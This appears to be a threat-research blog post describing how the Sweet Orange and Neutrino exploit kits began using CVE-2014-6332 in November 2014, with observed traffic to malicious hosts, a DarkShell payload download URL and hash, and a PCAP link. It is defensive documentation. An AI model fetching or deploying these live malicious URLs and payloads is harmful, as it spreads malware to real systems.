For this CVE referer to :
http://technet.microsoft.com/security/bulletin/MS14-064

The first encounter I had with this CVE in exploit kit, was in the Sweet Orange from the actor pushing DarkShell via KR compromised website. The landing provided by @MalwareSigs the 2014-11-19 was already containing CVE-2014-6332


So this actor :
DarkShell pushed by Da Gong via CVE-2014-0515
2014-09-28
that we saw moving to Sweet Orange :



Sweet Orange :

The URL pattern are different, but at a given time the modifications are similar on both...


Da Orangade firing CVE-2014-6332 and DarkShell Call back
2014-11-19
GET http://98.126.249 .92:82/index.html
200 OK (text/html)

Sweet Orange Landing
2014-11-19
A replace then a b64decode on the second b64 blob and we have :

CVE-2014-6332 in Sweet Orange
2014-11-19
GET http://v.krtedun .com/sum.exe - DarkShell - fc1a3c9fc7a80e80109f1e2a32e2b057
200 OK (application/octet-stream)

Here a more "standard" Sweet Orange :

CVE-2014-6332 fired by Sweet Orange - And Betabot call back.
2014-11-21
File :  You'll find a PCAP illustrating this here 
http://www.threatglass.com/serve_pcap/498fe35b94145153f51c51f66abe42af/20141121 from 
http://www.threatglass.com/malicious_urls/volumebass-com-2014-11-21 (in this pcap the CVE-2014-6332 is in the first b64 blob)

Neutrino :

Neutrino Firing CVE-2014-6332 embedded in a flash
2014-11-20

Please refer to this post : Neutrino : The come back !

Read More :

Neutrino : The come back ! - 2014-11-20
IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows - 2014-11-11
http://technet.microsoft.com/security/bulletin/MS14-064
0

Add a comment

Loading